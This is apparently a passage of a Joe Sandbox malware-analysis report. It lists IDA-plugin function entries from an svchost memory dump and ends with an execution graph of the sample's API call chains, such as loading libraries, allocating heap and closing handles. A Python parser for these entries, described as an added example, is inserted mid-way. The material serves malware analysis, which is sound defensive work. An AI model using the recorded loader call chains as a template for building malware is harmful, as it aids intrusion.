                                                                              • Instruction Fuzzy Hash: FA90022124140C02D140B2588454747400BC7D0701F96C012A0024558D8B1A8A6566B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7ce61163c570eb71effab79aca9290af278e8b1b65eb8bf01d7185b76370a12a
                                                                              • Instruction ID: a9f046f472ae041aa9ab1269dc12bb4c1ca045a3c2b9b053e93a73cc8fea41fe
                                                                              • Opcode Fuzzy Hash: 7ce61163c570eb71effab79aca9290af278e8b1b65eb8bf01d7185b76370a12a
                                                                              • Instruction Fuzzy Hash: CB90022120184842D140B3584844B4F810A87E1302FD6C01AA4156558CCE1989555731
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fb5a18b1fbaca51a1bb437f9345af34e51edeb33ed0e96870f1f040ef618d3e8
                                                                              • Instruction ID: 30d74a254c04f7e8553604c7050cade66c232875b9a70b6c2cc632ce732dcee0
                                                                              • Opcode Fuzzy Hash: fb5a18b1fbaca51a1bb437f9345af34e51edeb33ed0e96870f1f040ef618d3e8
                                                                              • Instruction Fuzzy Hash: B090022921340402D180B258544864A400A87D1302FD6D416A001555CCCE1989695331
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d09e79b07f4f0c9f03a70a93e72db37cb9da632792e0a7e4a2cc9686161b0c92
                                                                              • Instruction ID: 672b4469694b36afb9e820c61ce8931173e1ebe7a4825f9cc632e706461aa190
                                                                              • Opcode Fuzzy Hash: d09e79b07f4f0c9f03a70a93e72db37cb9da632792e0a7e4a2cc9686161b0c92
                                                                              • Instruction Fuzzy Hash: B1900231202405429540B3585844A8E810A87E1302BD6D416A0015558CCE1889615231
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0724a55702557b88eab522a681f65254646a936601d49c18b871fd219445dc67
                                                                              • Instruction ID: 075ed57014af68d780c9e581c0fd3fd5d9054d15b653e7f65f31ac4293f73864
                                                                              • Opcode Fuzzy Hash: 0724a55702557b88eab522a681f65254646a936601d49c18b871fd219445dc67
                                                                              • Instruction Fuzzy Hash: 5990023520140802D510B2585844686404B87D0301F96D412A042455CD8B5889A1A131
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f6bbe34faf38423a2af5c2874f69607b4429775ac7edf08cb935ebffec54d0f0
                                                                              • Instruction ID: 806b039d6371e4f527156db2afec7b665d7abe141e3f5d8ac3d59411953d7dfb
                                                                              • Opcode Fuzzy Hash: f6bbe34faf38423a2af5c2874f69607b4429775ac7edf08cb935ebffec54d0f0
                                                                              • Instruction Fuzzy Hash: 9C90023120140802D100B6985448686400A87E0301F96D012A5024559ECB6989916131
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 07a98a7412d0fe01d53a863fbbd752a3e3e2cc27cdaa43e0ae0223f92ba8f990
                                                                              • Instruction ID: 91d7a4e47c06e320ca148faec19256fb603671885ea1973d301cb26e87b3080e
                                                                              • Opcode Fuzzy Hash: 07a98a7412d0fe01d53a863fbbd752a3e3e2cc27cdaa43e0ae0223f92ba8f990
                                                                              • Instruction Fuzzy Hash: A390023120140803D100B2585548747400A87D0301F96D412A042455CDDB5A89516131
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fd0cd61c70e95480d2a22868317c37e6d12c7c3576a11faf8e072a87fbaa05e0
                                                                              • Instruction ID: 6c875257121a20332aef1164de5238a92b1e09c82d1a6603dc0ec3062c1801e7
                                                                              • Opcode Fuzzy Hash: fd0cd61c70e95480d2a22868317c37e6d12c7c3576a11faf8e072a87fbaa05e0
                                                                              • Instruction Fuzzy Hash: 2090022160540802D140B2585458746401A87D0301F96D012A0024558DCB5D8B5566B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ba9005bb96f146622660bdcdccae020250d42037b06e37970c204efd3a20bee6
                                                                              • Instruction ID: cf8172b1e8da8ad95efb9db8a736e593390540e95d237bffdc2c3e332be5f8f9
                                                                              • Opcode Fuzzy Hash: ba9005bb96f146622660bdcdccae020250d42037b06e37970c204efd3a20bee6
                                                                              • Instruction Fuzzy Hash: 1490023120140C42D100B2584444B86400A87E0301F96C017A0124658D8B19C9517531
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c081755656b2c2ee4a0969a0f1751c74fcfc9b71dfa9df4a6f7a36a7b831ef4e
                                                                              • Instruction ID: 85a7ce7d1fba9afba6edc3cc0ec763e3c3ffde9bd170bc9b91b8edcd9a3683d3
                                                                              • Opcode Fuzzy Hash: c081755656b2c2ee4a0969a0f1751c74fcfc9b71dfa9df4a6f7a36a7b831ef4e
                                                                              • Instruction Fuzzy Hash: 3D90023120148C02D110B258844478A400A87D0301F9AC412A442465CD8B9989917131
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction ID: 753309e0dc3e3b2c57bf69f5c6ba90d10068aba477833187e49ad9ddd6b483c7
                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              • Opcode ID: efdb772acde483bd6861764ebe7ee4a00185b0615d695e62262ad3eeb6309758
                                                                              • Instruction ID: ec548c573cde0ac30e1b9fc2c60b262bfd6e5c1b0492a2015831f35271c54223
                                                                              • Opcode Fuzzy Hash: efdb772acde483bd6861764ebe7ee4a00185b0615d695e62262ad3eeb6309758
                                                                              • Instruction Fuzzy Hash: 9451B6B6A04616BFCB10DB9C8DD0A7EF7F8BB09200B18856BE4A5D7641D334DE44CBA0
                                                                              Strings
                                                                              • Execute=1, xrefs: 03AA4713
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03AA4655
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03AA4725
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03AA46FC
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 03AA4787
                                                                              • ExecuteOptions, xrefs: 03AA46A0
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03AA4742
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              • Opcode ID: 7620e91770c2155ed5f3670237c5494f1820e3e3002a7780dea0961e5db58653
                                                                              • Instruction ID: d804800f09c69c4131d25540a1b71c262a40e26422fdb78533fe97d5d351d51e
                                                                              • Opcode Fuzzy Hash: 7620e91770c2155ed5f3670237c5494f1820e3e3002a7780dea0961e5db58653
                                                                              • Instruction Fuzzy Hash: E0511B396103197EDF10EB69DD85FAE73BCEF09308F0801ABE505AB291E7769A418F50
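The entries above are machine output from the Joe Sandbox IDA plugin, and a report like this one carries thousands of them. When triaging, the practical first steps are to skip the stub functions whose "API ID" and "String ID" are both blank, and to turn the absolute xref addresses of the remaining strings (for example the CLIENT(ntdll) debug strings listed above) into offsets inside the dumped region so they can be located in the .sdmp file. The Python below is an added example, not code from the report or from Joe Sandbox: it parses entries in exactly the layout printed on this page (the labels are the ones visible above; the input is a constructed excerpt copied, abridged, from the entries above, plus one deliberately truncated entry), filters out stub entries, and resolves each string xref against the "Offset" value of its own Memory Dump Source line.

```python
"""Parse Joe Sandbox IDA plugin function entries (added example, not part of
the report). Relies only on the labels visible in the entries above."""
import re
from dataclasses import dataclass, field

# Constructed input: three entries copied (abridged) from the report above in
# the order the report prints them, then a fourth entry cut off mid-way to
# show the end-of-page case. Blank 'API ID'/'String ID' marks a stub function.
SAMPLE = """\
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: efdb772acde483bd6861764ebe7ee4a00185b0615d695e62262ad3eeb6309758
• Instruction ID: ec548c573cde0ac30e1b9fc2c60b262bfd6e5c1b0492a2015831f35271c54223
• Instruction Fuzzy Hash: 9451B6B6A04616BFCB10DB9C8DD0A7EF7F8BB09200B18856BE4A5D7641D334DE44CBA0
Strings
• Execute=1, xrefs: 03AA4713
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03AA4655
• ExecuteOptions, xrefs: 03AA46A0
Memory Dump Source
• Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: 7620e91770c2155ed5f3670237c5494f1820e3e3002a7780dea0961e5db58653
• Instruction ID: d804800f09c69c4131d25540a1b71c262a40e26422fdb78533fe97d5d351d51e
• Instruction Fuzzy Hash: E0511B396103197EDF10EB69DD85FAE73BCEF09308F0801ABE505AB291E7769A418F50
Memory Dump Source
• Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ba9005bb96f146622660bdcdccae020250d42037b06e37970c204efd3a20bee6
• Instruction ID: cf8172b1e8da8ad95efb9db8a736e593390540e95d237bffdc2c3e332be5f8f9
• Instruction Fuzzy Hash: 1490023120140C42D100B2584444B86400A87E0301F96C017A0124658D8B19C9517531
APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 03ABCFBD
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
BULLET = "• "
HEXADDR = re.compile(r"\b[0-9A-Fa-f]{6,16}\b")


@dataclass
class Entry:
    fields: dict = field(default_factory=dict)   # label -> value ('Opcode ID', 'Offset', ...)
    strings: list = field(default_factory=list)  # (string, [absolute xref address, ...])
    apis: list = field(default_factory=list)     # (api name, [absolute ref address, ...])
    complete: bool = False                       # False if cut off before 'Instruction Fuzzy Hash'

    @property
    def base(self):
        """Load address of the dumped region, taken from 'Offset: 03A00000'."""
        return int(self.fields["Offset"], 16) if "Offset" in self.fields else None

    def rva(self, addr):
        """Position of an xref inside the dump file: address minus the dump base."""
        return addr - self.base


def parse_entries(text):
    """Split the page text into Entry records; 'Instruction Fuzzy Hash' ends each one."""
    entries, cur, section = [], Entry(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
        elif line.startswith(BULLET):
            body = line[len(BULLET):]
            if section == "Strings" and ", xrefs: " in body:
                s, _, refs = body.rpartition(", xrefs: ")
                cur.strings.append((s, [int(a, 16) for a in HEXADDR.findall(refs)]))
            elif section == "APIs" and " ref: " in body:
                name, _, refs = body.rpartition(" ref: ")
                cur.apis.append((name, [int(a, 16) for a in HEXADDR.findall(refs)]))
            elif body.startswith("Source File: "):
                for part in body.split(", "):        # 'Source File', 'Offset', 'based on PE'
                    k, _, v = part.partition(": ")
                    cur.fields[k] = v
            else:
                k, _, v = body.partition(": ")       # a bare 'API ID:' has no value
                k = k.rstrip(":")
                cur.fields[k] = v
                if k == "Instruction Fuzzy Hash":
                    cur.complete = True
                    entries.append(cur)
                    cur = Entry()
    if cur.fields or cur.strings or cur.apis:      # page ended mid-entry
        entries.append(cur)
    return entries


def with_signal(entries):
    """Drop stub entries: no API name, no embedded string, no API/string refs."""
    return [e for e in entries
            if e.fields.get("API ID") or e.fields.get("String ID") or e.apis or e.strings]


def find_strings(entries, pattern):
    """(string, offset-in-dump) for every embedded string matching the regex."""
    rx = re.compile(pattern)
    return [(s, e.rva(a)) for e in entries for s, addrs in e.strings if rx.search(s) for a in addrs]


if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    print(len(ents), "entries,", len(with_signal(ents)), "with API/string signal")
    for s, off in find_strings(ents, r"^CLIENT\(ntdll\)"):
        print(f"{off:#x}  {s}")
```

The offset arithmetic holds only because every entry here comes from the same dump (Offset: 03A00000); entries from another .sdmp carry their own Offset and must be resolved against it, which is why `rva` is a method on the entry rather than a module-level constant. Which module that dump is a copy of is not something these entries alone establish; the offsets just tell you where in the dumped bytes to look.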
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-$0$0
                                                                              • API String ID: 1302938615-699404926
                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction ID: 692d9c299c65e652c387dedeb3a643475e05cd2aeb33f94cf9d3aef3ba7e780e
                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction Fuzzy Hash: 96816BB4E062499EDF24CF68CCD17EEBBB6AF46250F1C425FD861AB391C63499408B70
                                                                              Strings
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03AA02BD
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03AA02E7
                                                                              • RTL: Re-Waiting, xrefs: 03AA031E
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                              • API String ID: 0-2474120054
                                                                              • Opcode ID: 8171a73a522a2e2ae02657b52d39fa63da7ae1955ecb5dc9dfb5641cec53ac31
                                                                              • Instruction ID: a829cdd8fd70b01a40f07c48e17ebcbf59ac56834db0bff96b6692793dc9fac0
                                                                              • Opcode Fuzzy Hash: 8171a73a522a2e2ae02657b52d39fa63da7ae1955ecb5dc9dfb5641cec53ac31
                                                                              • Instruction Fuzzy Hash: 57E1CC31608B41DFD724CF28C984B2AB7E4BF89314F180A6EF9A58B6E1D774D944CB52
                                                                              Strings
                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03AA7B7F
                                                                              • RTL: Resource at %p, xrefs: 03AA7B8E
                                                                              • RTL: Re-Waiting, xrefs: 03AA7BAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 0-871070163
                                                                              • Opcode ID: 61908beaef8b2c082e8c6ead0c6af44ea67c14cd38f2fc56d018a4c2fc5bec77
                                                                              • Instruction ID: 9c081307b8ba9ad594f599379f55e6de82f50171cc0e9ed5beb7c738b348f49c
                                                                              • Opcode Fuzzy Hash: 61908beaef8b2c082e8c6ead0c6af44ea67c14cd38f2fc56d018a4c2fc5bec77
                                                                              • Instruction Fuzzy Hash: D541B2367007029FC724DF69CD40B6AB7E9EB89710F140A2EE956DB690DB71E4058BA1
                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03AA728C
                                                                              Strings
                                                                              • RTL: Resource at %p, xrefs: 03AA72A3
                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03AA7294
                                                                              • RTL: Re-Waiting, xrefs: 03AA72C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 885266447-605551621
                                                                              • Opcode ID: dd123cc5c18aee18e19779f90ea561fd81ed4fff567570b827424dcb1576b59f
                                                                              • Instruction ID: 0a863f17a1bc196f58818d7adb1a92f36501d85c610dbd7bd0b90e1c26c2093c
                                                                              • Opcode Fuzzy Hash: dd123cc5c18aee18e19779f90ea561fd81ed4fff567570b827424dcb1576b59f
                                                                              • Instruction Fuzzy Hash: 2B41E136600706AFC724DF69CC41B6AB7A9FB94710F140A2FF855DB240DB31E81687E1
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-
                                                                              • API String ID: 1302938615-2137968064
                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction ID: eac62f73c55acd8fb255fd76053b445bae2821f540de45e3cc07a6c78ae7ed7e
                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction Fuzzy Hash: 3E91A071E002169EDB24DF69CDC1ABEB7B9AF44320F58462FE865E72C0D7368942CB50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$@
                                                                              • API String ID: 0-1194432280
                                                                              • Opcode ID: 63a5f381fc25654856b3000758802225db1f937adccef64e4812b2e7955b3615
                                                                              • Instruction ID: 2827f768d20e42e7bebd5ce388238204eb0253c011ccd7e41c5e8bbc1d3255ab
                                                                              • Opcode Fuzzy Hash: 63a5f381fc25654856b3000758802225db1f937adccef64e4812b2e7955b3615
                                                                              • Instruction Fuzzy Hash: 55813A76D002699BDB31DF54CD44BEAB7B8AB48710F0445EBA90DB7680E7709E84CFA0
                                                                              APIs
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 03ABCFBD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: CallFilterFunc@8
                                                                              • String ID: @$@4Dw@4Dw
                                                                              • API String ID: 4062629308-3936743583
                                                                              • Opcode ID: fe8ba21721b095157a37d8375fabe7dd780dd29d9779efa5d68bfa52154ebb89
                                                                              • Instruction ID: 73c1969ad39ba0ea85eee9d84a630e85ee2ce8e84f7ddc24cbaa14fcdde0253e
                                                                              • Opcode Fuzzy Hash: fe8ba21721b095157a37d8375fabe7dd780dd29d9779efa5d68bfa52154ebb89
                                                                              • Instruction Fuzzy Hash: 1141CF79900324DFCB21DFA4C980AAEBBB8EF85714F04456BE915DB365D774C801CB61

                                                                              Execution Graph

                                                                              Execution Coverage:3.2%
                                                                              Dynamic/Decrypted Code Coverage:4.1%
                                                                              Signature Coverage:1.5%
                                                                              Total number of Nodes:462
                                                                              Total number of Limit Nodes:75
                                                                              execution_graph 79346 28c9dcf 79347 28c9dd7 79346->79347 79350 28c9e47 79346->79350 79348 28c9de6 79347->79348 79351 28db7e0 79347->79351 79354 28d9a60 79351->79354 79353 28db7f9 79353->79348 79355 28d9a7a 79354->79355 79356 28d9a8b RtlFreeHeap 79355->79356 79356->79353 79357 28c2908 79358 28c291c 79357->79358 79361 28c6460 79358->79361 79360 28c2933 79362 28c6493 79361->79362 79363 28c64b7 79362->79363 79368 28d9220 79362->79368 79363->79360 79365 28c64da 79365->79363 79372 28d96d0 79365->79372 79367 28c655a 79367->79360 79369 28d923d 79368->79369 79375 3072ca0 LdrInitializeThunk 79369->79375 79370 28d9269 79370->79365 79373 28d96ea 79372->79373 79374 28d96fb NtClose 79373->79374 79374->79367 79375->79370 79386 3072ad0 LdrInitializeThunk 79387 28c89d7 79388 28c89da 79387->79388 79390 28c8991 79388->79390 79391 28c7250 79388->79391 79392 28c7266 79391->79392 79394 28c729f 79391->79394 79392->79394 79395 28c70c0 LdrLoadDll LdrLoadDll 79392->79395 79394->79390 79395->79394 79396 28b9f10 79397 28ba1ca 79396->79397 79399 28ba5bf 79397->79399 79400 28db440 79397->79400 79401 28db466 79400->79401 79406 28b40f0 79401->79406 79403 28db472 79404 28db4ab 79403->79404 79409 28d57f0 79403->79409 79404->79399 79413 28c33a0 79406->79413 79408 28b40fd 79408->79403 79410 28d5852 79409->79410 79412 28d585f 79410->79412 79431 28c1b70 79410->79431 79412->79404 79414 28c33bd 79413->79414 79416 28c33d6 79414->79416 79417 28da150 79414->79417 79416->79408 79419 28da16a 79417->79419 79418 28da199 79418->79416 79419->79418 79424 28d8cf0 79419->79424 79422 28db7e0 RtlFreeHeap 79423 28da212 79422->79423 79423->79416 79425 28d8d0a 79424->79425 79428 3072c0a 79425->79428 79426 28d8d36 79426->79422 79429 3072c11 79428->79429 79430 3072c1f LdrInitializeThunk 79428->79430 79429->79426 79430->79426 79432 28c1bab 79431->79432 79447 28c8040 79432->79447 79434 28c1bb3 79446 28c1e83 79434->79446 79458 28db8c0 79434->79458 
79436 28c1bc9 79437 28db8c0 RtlAllocateHeap 79436->79437 79438 28c1bda 79437->79438 79439 28db8c0 RtlAllocateHeap 79438->79439 79440 28c1beb 79439->79440 79442 28c1c7f 79440->79442 79472 28c6bc0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 79440->79472 79461 28c46e0 79442->79461 79444 28c1e32 79468 28d8130 79444->79468 79446->79412 79448 28c806c 79447->79448 79473 28c7f30 79448->79473 79451 28c8099 79453 28c80a4 79451->79453 79455 28d96d0 NtClose 79451->79455 79452 28c80b1 79454 28c80cd 79452->79454 79456 28d96d0 NtClose 79452->79456 79453->79434 79454->79434 79455->79453 79457 28c80c3 79456->79457 79457->79434 79484 28d9a10 79458->79484 79460 28db8db 79460->79436 79464 28c46fc 79461->79464 79462 28c470b 79462->79444 79463 28c472a 79466 28c4757 79463->79466 79467 28c4740 LdrLoadDll 79463->79467 79464->79462 79464->79463 79487 28dcc60 LdrLoadDll 79464->79487 79466->79444 79467->79466 79469 28d8192 79468->79469 79471 28d819f 79469->79471 79488 28c1ea0 79469->79488 79471->79446 79472->79442 79474 28c8026 79473->79474 79475 28c7f4a 79473->79475 79474->79451 79474->79452 79479 28d8d90 79475->79479 79478 28d96d0 NtClose 79478->79474 79480 28d8daa 79479->79480 79483 30735c0 LdrInitializeThunk 79480->79483 79481 28c801a 79481->79478 79483->79481 79485 28d9a2d 79484->79485 79486 28d9a3e RtlAllocateHeap 79485->79486 79486->79460 79487->79463 79491 28c1ec0 79488->79491 79504 28c8310 79488->79504 79490 28c2419 79490->79471 79491->79490 79508 28d1330 79491->79508 79494 28c20d7 79516 28dc9b0 79494->79516 79495 28c1f1e 79495->79490 79511 28dc880 79495->79511 79498 28c20ec 79500 28c2136 79498->79500 79522 28c09d0 79498->79522 79500->79490 79501 28c09d0 LdrInitializeThunk 79500->79501 79525 28c82b0 79500->79525 79501->79500 79502 28c2287 79502->79500 79503 28c82b0 LdrInitializeThunk 79502->79503 79503->79502 79505 28c831d 79504->79505 79506 28c833e SetErrorMode 79505->79506 79507 28c8345 79505->79507 79506->79507 79507->79491 79529 28db750 79508->79529 79510 
